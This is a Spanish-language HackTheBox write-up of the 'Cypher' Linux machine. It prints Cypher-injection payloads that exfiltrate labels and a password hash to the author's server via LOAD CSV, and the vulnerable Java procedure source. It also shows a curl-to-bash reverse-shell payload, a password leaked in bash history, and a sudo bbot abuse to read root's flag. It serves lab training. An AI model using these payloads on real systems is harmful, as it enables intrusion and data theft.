This page looks best with JavaScript enabled

HackTheBox - Cypher

 •  ✍️ sckull
featured image

Cypher expone un sitio vulnerable a Cypher Injection y tambien un archivo JAR en el cual descubrimos un procedure con la vulnerabilidad Command Injection la cual nos permitio el acceso a un primer usuario. Credenciales en el historial de bash nos permitieron acceso a un segundo usuario. Finalmente logramos la lectura de archivos y ejecucion de comandos como root con el comando bbot.

Nombre Cypher box_img_maker
OS

Linux

Puntos 30
Dificultad Medium
Fecha de Salida 2025-03-01
IP 10.10.11.57
Maker

Techromancer

Rated 
{
    "type": "bar",
    "data":  {
        "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
        "datasets": [{
            "label": "User Rated Difficulty",
            "data": [125, 114, 301, 317, 325, 122, 63, 21, 7, 26],
            "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
        }]
    },
    "options": {
        "scales": {
          "xAxes": [{"display": false}],
          "yAxes": [{"display": false}]
        },
        "legend": {"labels": {"fontColor": "white"}},
        "responsive": true
      }
}

Recon

nmap

nmap muestra multiples puertos abiertos: http (80) y ssh (22).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

# Nmap 7.94SVN scan initiated Sat Mar  1 18:33:01 2025 as: nmap -p22,80 -sV -sC -oN nmap_scan 10.10.11.57
Nmap scan report for 10.10.11.57
Host is up (0.067s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_  256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cypher.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar  1 18:33:10 2025 -- 1 IP address (1 host up) scanned in 8.70 seconds

Web Site

El sitio web nos redirige al dominio cypher.htb el cual agregamos al archivo /etc/hosts.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

❯ curl -sI 10.10.11.57
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 01 Mar 2025 23:35:26 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://cypher.htb/

La pagina principal del sitio muestra un mensaje con un enlace a una “Demo”.

image

El enlace nos redirige hacia un login.

image

Directory Brute Forcing

feroxbuster muestra distintas direcciones, entre ellas vemos la direccion hacia una API y un archivo .jar.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

❯ feroxbuster -u http://cypher.htb/ -w $CM
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://cypher.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)7
 🦡  User-Agent            │ feroxbuster/2.11.0
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      179l      477w     4986c http://cypher.htb/about
307      GET        0l        0w        0c http://cypher.htb/demo => http://cypher.htb/login
200      GET      126l      274w     3671c http://cypher.htb/login
200      GET        3l      113w     8123c http://cypher.htb/bootstrap-notify.min.js
200      GET       63l      139w     1548c http://cypher.htb/utils.js
200      GET        7l     1223w    80496c http://cypher.htb/bootstrap.bundle.min.js
200      GET       12l     2173w   195855c http://cypher.htb/bootstrap.min.css
200      GET     7333l    24018w   208204c http://cypher.htb/vivagraph.min.js
200      GET      876l     4886w   373109c http://cypher.htb/logo.png
307      GET        0l        0w        0c http://cypher.htb/api => http://cypher.htb/api/docs
404      GET        1l        2w       22c http://cypher.htb/apis
200      GET        2l     1293w    89664c http://cypher.htb/jquery-3.6.1.min.js
200      GET      162l      360w     4562c http://cypher.htb/
200      GET     5632l    33572w  2776750c http://cypher.htb/us.png
404      GET        1l        2w       22c http://cypher.htb/demo2
404      GET        1l        2w       22c http://cypher.htb/demos
200      GET      162l      360w     4562c http://cypher.htb/index
200      GET      162l      360w     4562c http://cypher.htb/index.html
307      GET        0l        0w        0c http://cypher.htb/api/ => http://cypher.htb/api/api
405      GET        1l        3w       31c http://cypher.htb/api/auth
301      GET        7l       12w      178c http://cypher.htb/testing => http://cypher.htb/testing/
200      GET       17l      139w     9977c http://cypher.htb/testing/custom-apoc-extension-1.0-SNAPSHOT.jar

Custom Procedures - Cypher

En testing/ encontramos unicamente el archivo custom-apoc-extension-1.0-SNAPSHOT.jar.

1
2
3
4
5
6
7
8

❯ curl -s http://cypher.htb/testing/ | html2text
****** Index of /testing/ ******
===============================================================================
../
custom-apoc-extension-1.0-SNAPSHOT.jar             17-Feb-2025 11:49
6556
===============================================================================

Descargamos el archivo y lo abrimos en jadx-gui. El codigo define dos procedures para Cypher, en el primero encontramos que, al pasarle un nombre, este devuelve un saludo.

image

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

package com.cypher.neo4j.apoc;

import java.util.stream.Stream;
import org.neo4j.procedure.Description;
import org.neo4j.procedure.Mode;
import org.neo4j.procedure.Name;
import org.neo4j.procedure.Procedure;

public class HelloWorldProcedure {

  @Procedure(name = "custom.helloWorld", mode = Mode.READ)
  @Description("A simple hello world procedure")

  public Stream<HelloWorldOutput> helloWorld(@Name("name") String name) {
    String greeting = "Hello, " + name + "!";
    return Stream.of(new HelloWorldOutput(greeting));
  }
  
  public static class HelloWorldOutput {
    public String greeting;
    
    public HelloWorldOutput(String greeting) {
      this.greeting = greeting;
    }
  }
}

El segundo muestra que, construye un comando con curl utilizando el valor de una URL que se le pasa como argumento, devuelve el codigo de respuesta HTTP. En este procedure observamos una vulnerabilidad de Command Injection, ya que la url no tiene ningun tipo de “filtro”, por lo que seria posible inyectar comandos para su ejecucion.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

package com.cypher.neo4j.apoc;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.concurrent.TimeUnit;
import java.util.stream.Stream;
import org.neo4j.procedure.Description;
import org.neo4j.procedure.Mode;
import org.neo4j.procedure.Name;
import org.neo4j.procedure.Procedure;

public class CustomFunctions {
  @Procedure(name = "custom.getUrlStatusCode", mode = Mode.READ)
  @Description("Returns the HTTP status code for the given URL as a string")

  public Stream<StringOutput> getUrlStatusCode(@Name("url") String url) throws Exception {
    if (!url.toLowerCase().startsWith("http://") && !url.toLowerCase().startsWith("https://"))
      url = "https://" + url; 
    String[] command = { "/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url };
    System.out.println("Command: " + Arrays.toString((Object[])command));
    Process process = Runtime.getRuntime().exec(command);
    BufferedReader inputReader = new BufferedReader(new InputStreamReader(process.getInputStream()));
    BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
    StringBuilder errorOutput = new StringBuilder();
    String line;
    while ((line = errorReader.readLine()) != null)
      errorOutput.append(line).append("\n"); 
    String statusCode = inputReader.readLine();
    System.out.println("Status code: " + statusCode);
    boolean exited = process.waitFor(10L, TimeUnit.SECONDS);
    if (!exited) {
      process.destroyForcibly();
      statusCode = "0";
      System.err.println("Process timed out after 10 seconds");
    } else {
      int exitCode = process.exitValue();
      if (exitCode != 0) {
        statusCode = "0";
        System.err.println("Process exited with code " + exitCode);
      } 
    } 
    if (errorOutput.length() > 0)
      System.err.println("Error output:\n" + errorOutput.toString()); 
    return Stream.of(new StringOutput(statusCode));
  }
  
  public static class StringOutput {
    public String statusCode;
    
    public StringOutput(String statusCode) {
      this.statusCode = statusCode;
    }
  }
}

Cypher injection

Al manipular el valor de usuario en el login del sitio este nos muestra un error.

image

El error muestra que se esta utilizando python por detras, ademas muestra el query para la autenticacion de usuarios por medio de Cypher.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

# POST data json
# {"username":"admin'","password":"admin"}

# Response
HTTP/1.1 400 Bad Request
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 01 Mar 2025 23:46:57 GMT
Content-Length: 3457
Connection: keep-alive

Traceback (most recent call last):
  File "/app/app.py", line 142, in verify_creds
    results = run_cypher(cypher)
  File "/app/app.py", line 63, in run_cypher
    return [r.data() for r in session.run(cypher)]
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/session.py", line 314, in run
    self._auto_result._run(
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/result.py", line 221, in _run
    self._attach()
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/result.py", line 409, in _attach
    self._connection.fetch_message()
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_common.py", line 178, in inner
    func(*args, **kwargs)
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_bolt.py", line 860, in fetch_message
    res = self._process_message(tag, fields)
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_bolt5.py", line 370, in _process_message
    response.on_failure(summary_metadata or {})
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_common.py", line 245, in on_failure
    raise Neo4jError.hydrate(**metadata)
neo4j.exceptions.CypherSyntaxError: {code: Neo.ClientError.Statement.SyntaxError} {message: Failed to parse string literal. The query must contain an even number of non-escaped quotes. (line 1, column 60 (offset: 59))
"MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'admin'' return h.value as hash"
                                                            ^}

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/app/app.py", line 165, in login
    creds_valid = verify_creds(username, password)
  File "/app/app.py", line 151, in verify_creds
    raise ValueError(f"Invalid cypher query: {cypher}: {traceback.format_exc()}")
ValueError: Invalid cypher query: MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'admin'' return h.value as hash: Traceback (most recent call last):
  File "/app/app.py", line 142, in verify_creds
    results = run_cypher(cypher)
  File "/app/app.py", line 63, in run_cypher
    return [r.data() for r in session.run(cypher)]
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/session.py", line 314, in run
    self._auto_result._run(
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/result.py", line 221, in _run
    self._attach()
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/work/result.py", line 409, in _attach
    self._connection.fetch_message()
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_common.py", line 178, in inner
    func(*args, **kwargs)
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_bolt.py", line 860, in fetch_message
    res = self._process_message(tag, fields)
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_bolt5.py", line 370, in _process_message
    response.on_failure(summary_metadata or {})
  File "/usr/local/lib/python3.9/site-packages/neo4j/_sync/io/_common.py", line 245, in on_failure
    raise Neo4jError.hydrate(**metadata)
neo4j.exceptions.CypherSyntaxError: {code: Neo.ClientError.Statement.SyntaxError} {message: Failed to parse string literal. The query must contain an even number of non-escaped quotes. (line 1, column 60 (offset: 59))
"MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'admin'' return h.value as hash"
                                                            ^}

El query muestra que el valor del usuario del login esta siendo utilizando directamente en el query.

1

MATCH (u:USER) -[:SECRET]-> (h:SHA1) WHERE u.name = 'admin' return h.value as hash

Injection

Al igual que en HTB - OnlyForYou realizamos una enumeracion. Ejecutamos un servidor HTTP para obtener los datos, aunque, en algunos casos en el mismo sitio nos devuelve los valores al mostrar el error. Vemos la version de Neo4j 5.24.1.

1
2
3
4

# VERSION
# ' OR 1=1 WITH 1 as a  CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.238/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

message: Invalid URL 'http://10.10.14.238/?version=5.24.1&name=Neo4j Kernel&edition=community': Illegal character in query at index 46: http://10.10.14.238/?version=5.24.1&name=Neo4j Kernel&edition=community ()}

Encontramos multiples labels, entre los que destacan USER y SHA1, los cuales son utilizados en el query para la auntenticacion.

1
2
3
4
5
6
7
8
9

# LABELS
# ' OR 1=1 WITH 1337 AS x CALL db.labels() YIELD label AS d LOAD CSV FROM 'http://10.10.14.238/?'+d AS y RETURN 0 as _0//
10.10.11.57 - - [01/Mar/2025 19:15:16] "GET /?USER HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:16] "GET /?HASH HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:16] "GET /?DNS_NAME HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:17] "GET /?SHA1 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:17] "GET /?SCAN HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:17] "GET /?ORG_STUB HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:15:17] "GET /?IP_ADDRESS HTTP/1.1" 200 -

Obtuvimos los valores de los labels, encontramos que existe un unico usuario y su hash.

1
2
3
4
5
6

# KEYS 
# ' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.238/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
# USER
10.10.11.57 - - [01/Mar/2025 19:16:14] "GET /?name=graphasm HTTP/1.1" 200 -
# SHA1
10.10.11.57 - - [01/Mar/2025 19:17:12] "GET /?value=9f54ca4c130be6d529a56dee59dc2b2090e43acf HTTP/1.1" 200 -

Encontramos otros valores que se desconoce su uso.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

# HASH <-- vacio
# DNS_NAME
message: Invalid input for function 'toString()': Expected a String, Float, Integer, Boolean, Temporal or Duration, got: StringArray[211.255.9.117, 220.187.22.183, 99.13.13.209, 143.2.172.244, 100.136.140.192, 2603:1010:3:3::5b, 2603:1020:201:10::10f, 2603:1030:20e:3::23c, 2603:1030:b:3::152, 2603:1030:c02:8::14] ()
# SCAN
10.10.11.57 - - [01/Mar/2025 19:17:40] "GET /?parent_uuid=d0ba01af-b882-4284-92f4-01412cb123c4 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:40] "GET /?scope_distance=0 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:41] "GET /?uuid=d0ba01af-b882-4284-92f4-01412cb123c4 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:41] "GET /?scan=SCAN:eb3cf8eb641dd2e8005128c2fee4b43e59fd7785 HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:41] "GET /?type=SCAN HTTP/1.1" 200 -
10.10.11.57 - - [01/Mar/2025 19:17:41] "GET /?web_spider_distance=0 HTTP/1.1" 200 -
# ORG_STUB
message: Invalid input for function 'toString()': Expected a String, Float, Integer, Boolean, Temporal or Duration, got: StringArray[Scan vehement_hagrid seeded with DNS_NAME: ecorp.com, speculated ORG_STUB: ecorp] ()
# IP_ADDRESS
message: Invalid input for function 'toString()': Expected a String, Float, Integer, Boolean, Temporal or Duration, got: StringArray[Scan vehement_hagrid seeded with DNS_NAME: ecorp.com, A record for ecorp.com contains IP_ADDRESS: 211.255.9.117] (Failure when processing file '' on line 17 (which is the last row in the file).)
10.10.11.57 - - [01/Mar/2025 19:20:09] "GET /?host=211.255.9.117 HTTP/1.1" 200 -

Command Injection

Como sabemos, existen dos procedures, intentamos utilizar estos en la inyeccion. Logramos ejecutar el procedure helloWorld() y este retorna un saludo.

image

1
2

# graphasm' CALL custom.helloWorld(u.name) YIELD greeting UNWIND greeting as g LOAD CSV FROM 'http://10.10.14.238/?g=' + g as l RETURN 0 as _0 //
message: Invalid URL 'http://10.10.14.238/?g=Hello, graphasm!': Illegal character in query at index 29: http://10.10.14.238/?g=Hello, graphasm! ()}

En el caso de getUrlStatusCode() este muestra el codigo HTTP de la solicitud a nuestro servidor http.

1
2
3
4
5
6
7

# "/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url
# Payload
# graphasm' CALL custom.getUrlStatusCode('http://10.10.14.238') YIELD statusCode UNWIND statusCode as g LOAD CSV FROM 'http://10.10.14.238/?g=' + g as l RETURN 0 as _0 //

# Response
10.10.11.57 - - [03/Mar/2025 03:48:04] "GET / HTTP/1.1" 200 -
10.10.11.57 - - [03/Mar/2025 03:48:04] "GET /?g=200 HTTP/1.1" 200 - # codigo 200

Ademas podemos ejecutar comandos, vemos la ejecucion de whoami, y el usuario es neo4j.

1
2
3
4
5
6
7

# Payload
# graphasm' CALL custom.getUrlStatusCode('http://10.10.14.238/$(whoami)') YIELD statusCode UNWIND statusCode as g LOAD CSV FROM 'http://10.10.14.238/?g=' + g as l RETURN 0 as _0 //

# Response
10.10.11.57 - - [03/Mar/2025 03:49:26] code 404, message File not found
10.10.11.57 - - [03/Mar/2025 03:49:26] "GET /neo4j HTTP/1.1" 404 -   # output whoami
10.10.11.57 - - [03/Mar/2025 03:49:26] "GET /?g=404 HTTP/1.1" 200 --

User - Neo4j

Ejecutamos una shell inversa utilizando shells.

1
2

# Payload
# graphasm' CALL custom.getUrlStatusCode('`curl 10.10.14.238:8000/10.10.14.238:1338|bash)`') YIELD statusCode UNWIND statusCode as g LOAD CSV FROM 'http://10.10.14.238/?g=' + g as l RETURN 0 as _0 //

En netcat, recibimos una shell como neo4j.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.238] from cypher.htb [10.10.11.57] 45074
/bin/sh: 0: can't access tty; job control turned off
$ whoami;id
neo4j
uid=110(neo4j) gid=111(neo4j) groups=111(neo4j)
$ cd
$ pwd
/var/lib/neo4j
$

User - graphasm

En el directorio de neo4j encontramos una contrasena para neo4j.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

$ ls -lah
total 60K
drwxr-xr-x 13 neo4j adm   4.0K Mar  2 00:57 .
drwxr-xr-x 50 root  root  4.0K Feb 17 16:48 ..
-rw-r--r--  1 neo4j neo4j   63 Oct  8 18:07 .bash_history
drwxrwxr-x  3 neo4j adm   4.0K Oct  8 18:07 .cache
drwxr-xr-x  2 neo4j adm   4.0K Aug 16  2024 certificates
drwxr-xr-x  6 neo4j adm   4.0K Mar  2 00:57 data
drwx------  3 neo4j neo4j 4.0K Mar  1 22:57 .gnupg
drwxr-xr-x  2 neo4j adm   4.0K Aug 16  2024 import
drwxr-xr-x  2 neo4j adm   4.0K Feb 17 16:24 labs
drwxr-xr-x  2 neo4j adm   4.0K Aug 16  2024 licenses
drwxr-xr-x  3 neo4j neo4j 4.0K Mar  2 00:57 .local
-rw-r--r--  1 neo4j adm     52 Oct  2 15:55 packaging_info
drwxr-xr-x  2 neo4j adm   4.0K Feb 17 16:24 plugins
drwxr-xr-x  2 neo4j adm   4.0K Feb 17 16:24 products
drwxr-xr-x  2 neo4j adm   4.0K Mar  2 01:01 run
lrwxrwxrwx  1 neo4j adm      9 Oct  8 18:07 .viminfo -> /dev/null
$ cat .bash_history
neo4j-admin dbms set-initial-password cU4btyib.20xtCMCXkBmerhK
$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
graphasm:x:1000:1000:graphasm:/home/graphasm:/bin/bash
neo4j:x:110:111:neo4j,,,:/var/lib/neo4j:/bin/bash
$

Utilizamos esta con el usuario graphasm, logrando obtener una shell SSH y la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

❯ ssh graphasm@cypher.htb
The authenticity of host 'cypher.htb (10.10.11.57)' can't be established.
ED25519 key fingerprint is SHA256:u2MemzvhD6xY6z0eZp5B2G3vFuG+dPBlRFrZ66gaXZw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cypher.htb' (ED25519) to the list of known hosts.
graphasm@cypher.htb's password: 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-53-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Mar  2 01:13:10 AM UTC 2025

  System load:  0.32              Processes:             288
  Usage of /:   73.8% of 8.50GB   Users logged in:       1
  Memory usage: 60%               IPv4 address for eth0: 10.10.11.57
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Mar 2 01:13:11 2025 from 10.10.14.238
graphasm@cypher:~$ whoami;id 
graphasm
uid=1000(graphasm) gid=1000(graphasm) groups=1000(graphasm)
graphasm@cypher:~$ ls
bbot_preset.yml  bbot_scans  user.txt
graphasm@cypher:~$ cat user.txt 
dcf630f09858401686c357e8a559fcae
graphasm@cypher:~$

Privesc

Encontramos que el usuario graphasm puede ejecutar bbot como root.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

graphasm@cypher:~$ sudo -l -l
Matching Defaults entries for graphasm on cypher:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User graphasm may run the following commands on cypher:

Sudoers entry: /etc/sudoers
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
	/usr/local/bin/bbot
graphasm@cypher:~$

Reading Files (target)

Ejecutamos bbot pasandole la flag root.txt como target, ademas especificamos verbosidad. bbot tomaria el archivo como una lista de objetivos y se mostrarian en el output de la ejecucion, logrando obtener su contenido.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127

graphasm@cypher:~$ sudo bbot -y -t /root/root.txt -m httpx --force -v
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

[INFO] Reading targets from file: /root/root.txt
[VERB] Creating events from 1 targets
[VERB] 
[VERB] ### MODULES ENABLED ###
[VERB] 
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | Module     | Type     | Needs API Key   | Description                   | Flags                        | Consumed Events      | Produced Events    |
[VERB] +============+==========+=================+===============================+==============================+======================+====================+
[VERB] | httpx      | scan     | No              | Visit webpages. Many other    | active, cloud-enum, safe,    | OPEN_TCP_PORT, URL,  | HTTP_RESPONSE, URL |
[VERB] |            |          |                 | modules rely on httpx         | social-enum, subdomain-enum, | URL_UNVERIFIED       |                    |
[VERB] |            |          |                 |                               | web-basic                    |                      |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | csv        | output   | No              | Output to CSV                 |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | json       | output   | No              | Output to Newline-Delimited   |                              | *                    |                    |
[VERB] |            |          |                 | JSON (NDJSON)                 |                              |                      |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | python     | output   | No              | Output via Python API         |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | stdout     | output   | No              | Output to text                |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | txt        | output   | No              | Output to text                |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | cloudcheck | internal | No              | Tag events by cloud provider, |                              | *                    |                    |
[VERB] |            |          |                 | identify cloud resources like |                              |                      |                    |
[VERB] |            |          |                 | storage buckets               |                              |                      |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | dnsresolve | internal | No              |                               |                              | *                    |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | aggregate  | internal | No              | Summarize statistics at the   | passive, safe                |                      |                    |
[VERB] |            |          |                 | end of a scan                 |                              |                      |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | excavate   | internal | No              | Passively extract juicy       | passive                      | HTTP_RESPONSE,       | URL_UNVERIFIED,    |
[VERB] |            |          |                 | tidbits from scan data        |                              | RAW_TEXT             | WEB_PARAMETER      |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] | speculate  | internal | No              | Derive certain event types    | passive                      | AZURE_TENANT,        | DNS_NAME, FINDING, |
[VERB] |            |          |                 | from others by common sense   |                              | DNS_NAME,            | IP_ADDRESS,        |
[VERB] |            |          |                 |                               |                              | DNS_NAME_UNRESOLVED, | OPEN_TCP_PORT,     |
[VERB] |            |          |                 |                               |                              | HTTP_RESPONSE,       | ORG_STUB           |
[VERB] |            |          |                 |                               |                              | IP_ADDRESS,          |                    |
[VERB] |            |          |                 |                               |                              | IP_RANGE, SOCIAL,    |                    |
[VERB] |            |          |                 |                               |                              | STORAGE_BUCKET, URL, |                    |
[VERB] |            |          |                 |                               |                              | URL_UNVERIFIED,      |                    |
[VERB] |            |          |                 |                               |                              | USERNAME             |                    |
[VERB] +------------+----------+-----------------+-------------------------------+------------------------------+----------------------+--------------------+
[VERB] Loading word cloud from /root/.bbot/scans/questionable_joyce/wordcloud.tsv
[INFO] Scan with 1 modules seeded with 1 targets (1 in whitelist)
[INFO] Installing module dependencies. Please be patient, this may take a while.
[VERB] Installing dependencies for module "httpx"
[INFO] Running 1 Ansible tasks for httpx
[WARN] Failed to run Ansible tasks for httpx
[WARN] Setup failed for module "httpx"
[ERRR] Failed to install dependencies for 1 modules: httpx
[VERB] Loading 0 scan modules: 
[VERB] Loading 5 internal modules: aggregate,cloudcheck,dnsresolve,excavate,speculate
[VERB] Loaded module "aggregate"
[VERB] Loaded module "cloudcheck"
[VERB] Loaded module "dnsresolve"
[VERB] Loaded module "excavate"
[VERB] Loaded module "speculate"
[INFO] Loaded 5/5 internal modules (aggregate,cloudcheck,dnsresolve,excavate,speculate)
[VERB] Loading 5 output modules: csv,json,python,stdout,txt
[VERB] Loaded module "csv"
[VERB] Loaded module "json"
[VERB] Loaded module "python"
[VERB] Loaded module "stdout"
[VERB] Loaded module "txt"
[INFO] Loaded 5/5 output modules, (csv,json,python,stdout,txt)
[VERB] Setting up modules
[INFO] internal.excavate: Compiling 11 YARA rules
[INFO] internal.speculate: No portscanner enabled. Assuming open ports: 80, 443
[SUCC] Setup succeeded for 12/12 modules.
[SUCC] Starting scan questionable_joyce
[VERB] Starting module worker loops
[VERB] 12 modules started
[VERB] _scan_ingress: Target: SCAN("{'id': 'SCAN:2a008a5e1eacbc6b81c464cf7b28674272c487d6', 'name': 'questionable_jo...", module=TARGET, tags={'in-scope', 'target'})
[VERB] _scan_ingress: Target: DNS_NAME("b23be622c570cb02f01e28b4e38997ef", module=TARGET, tags={'distance-1', 'target'})
[SCAN]              	questionable_joyce (SCAN:2a008a5e1eacbc6b81c464cf7b28674272c487d6)	TARGET	(in-scope, target)
